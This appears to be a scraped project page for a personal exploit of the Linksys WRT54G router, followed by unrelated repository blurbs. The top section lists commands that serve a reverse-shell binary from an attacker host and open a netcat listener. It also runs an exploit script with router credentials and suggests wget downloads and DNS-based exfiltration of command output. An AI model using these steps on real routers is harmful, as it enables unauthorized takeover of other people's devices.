Exploiting Linksys WRT54G using a vulnerability I found.

Related tags

Miscellaneousrouterfirmwareopenwrtreverse-engineeringexploitation
Overview

Exploiting Linksys WRT54G

Exploit

# Install the requirements.
pip install -r requirements.txt


ROUTER_HOST=192.169.1.1
ROUTER_USERNAME=admin
ROUTER_PASSWORD=admin

ATTACKER_HOST=192.169.1.100
ATTACKER_HTTP_SERVER_PORT=8000
ATTACKER_REVSHELL_HANDLER_PORT=4141


# Start HTTP server in order to serve the reverse shell executable.
cd revshell
python -m SimpleHTTPServer $ATTACKER_HTTP_SERVER_PORT

# Start reverse shell handler.
nc -l $ATTACKER_REVSHELL_HANDLER_PORT

# Run the exploit.
python exploit.py --host $ROUTER_HOST --username $ROUTER_USERNAME --password $ROUTER_PASSWORD --attacker-host $ATTACKER_HOST --attacker-http-port $ATTACKER_HTTP_SERVER_PORT --attacker-handler-port $ATTACKER_REVSHELL_HANDLER_PORT

Leads for leaking command output

  • Look for file paths that are displayed within the web interface that command output can be written to.
    Using /tmp/ping.log to view the output at /Ping.asp.
  • Use wget to download reverse shell binary to the router.
  • Config the attacker as the DNS server and force the router to issue DNS requests with the command output.
    Like nslookup `whoami`.fake.domain

TODOs

  • Use argparse and make the exploit an executable.

Unsolved Mysteries

  • If ui_language is stored in nvram (Non-Volatile Memory), how come it fixes itself upon reboot?

Links

Firmware
Toolchain

Owner
Elon Gliksberg
I like working on interesting problems.
Elon Gliksberg
GitHub Repository https://elongl.github.io/exploitation/2021/05/30/pwning-home-router.html
A log likelihood fit for extracting neutrino oscillation parameters

A-log-likelihood-fit-for-extracting-neutrino-oscillation-parameters Minimised the negative log-likelihood fit to extract neutrino oscillation paramete

Vid Homsak 1 Jan 23, 2022
Insights in greek football league 2020-2021 and bookmaker's accuracy

Greek_Football_League_Analysis_2020_2021 Aim of Project: This project aims in deriving useful insights from greek football league 2020-2021 by mean st

2 Jan 16, 2022
ChronoRace is a tool to accurately perform timed race conditions to circumvent application business logic.

ChronoRace is a tool to accurately perform timed race conditions to circumvent application business logic. I've found in my research that w

Tanner 64 Aug 04, 2022
HairCLIP: Design Your Hair by Text and Reference Image

Overview This repository hosts the official PyTorch implementation of the paper: "HairCLIP: Design Your Hair by Text and Reference Image". Our single

322 Dec 30, 2022
Woltcheck - Python script to check if a wolt restaurant is ready to deliver to your location

woltcheck Python script to check if a wolt restaurant is ready to deliver to you

30 Sep 13, 2022
My solutions to Advent of Code 2021 (written in Python)

Advent of Code 2021 This repository contains my solutions for the 2021 edition of Advent of Code. Please do not expect perfectly polished solutions, m

Nils 2 May 29, 2022
In the works, creating a new Chess Board and way to Play...

sWJz4Chess date started on github.com 11-13-2021 In the works, creating a new Chess Board and way to Play... starting to write this in Pygame, any ind

Shawn 2 Nov 18, 2021
A collection of online resources to help you on your Tech journey.

Everything Tech Resources & Projects About The Project Coming from an engineering background and looking to up skill yourself on a new field can be di

Mohamed A 396 Dec 31, 2022
A Pythonic Data Catalog powered by Ray that brings exabyte-level scalability and fast, ACID-compliant, change-data-capture to your big data workloads.

DeltaCAT DeltaCAT is a Pythonic Data Catalog powered by Ray. Its data storage model allows you to define and manage fast, scalable, ACID-compliant dat

45 Oct 15, 2022
A python module for DeSo

DeSo.py A python package for DeSo. Developed by ItsAditya Run pip install deso to install the module! Examples of How To Use DeSo.py Getting $DeSo pri

ItsAditya 0 Jun 30, 2022
Simple tools to make/dump CPC+ CPR cartridge files

Simple tools to make/dump CPC+ CPR cartridge files mkcpr.py: make a CPR file from files (one chunk per file); see notes cprdump.py: dump the chunks of

Juan J. Martínez 3 May 30, 2022
Polypheny Connector for Python

Polypheny Connector for Python This enables Python programs to access Polypheny databases, using an API that is compliant with the Python Database API

Polypheny 3 Jan 03, 2022
Experiments with Tox plugin system

The project is an attempt to add to the tox some missing out of the box functionality. Basically it is just an extension for the tool that will be loa

Volodymyr Vitvitskyi 30 Nov 26, 2022
A system for assigning and grading notebooks

nbgrader Linux: Windows: Forum: Coverage: Cite: A system for assigning and grading Jupyter notebooks. Documentation can be found on Read the Docs. Hig

Project Jupyter 1.2k Dec 26, 2022
My attempt at this years Advent of Code!

Advent-of-code-2021 My attempt at this years Advent of Code! day 1: ** day 2: ** day 3: ** day 4: ** day 5: ** day 6: ** day 7: ** day 8: * day 9: day

1 Jul 06, 2022
kodi addon 115网盘

plugin.video.115 kodi addon 115网盘 插件,需要kodi 18以上版本,原码播放需配合 https://github.com/feelfar/115proxy-for-kodi 使用 安装 HEAD 由于release包尚未释出,可直接下载源代码zip包

109 Dec 29, 2022
A python script that will automate the boring task of login to the captive portal again and again

A python script that will automate the boring task of login to the captive portal again and again

Rakib Hasan 2 Feb 09, 2022
This is a a CSMA/CA simulator written in Python based on simulator of the same type

This is a a CSMA/CA simulator written in Python based on simulator of the same type found the link https://github.com/StevenSLXie/CSMA-Simulator with

M. Ismail 4 Nov 22, 2022
because rico hates uuid's

terrible-uuid-lambda because rico hates uuid's sub 200ms response times! Try it out here: https://api.mathisvaneetvelde.com/uuid https://api.mathisvan

Mathis Van Eetvelde 2 Feb 15, 2022
This is the Quiz that I made using Python Programming Language. This can only run in the Terminal

This is the Quiz that I made using Python Programming Language. This can only run in the Terminal

YOSHITHA RATHNAYAKE 1 Apr 08, 2022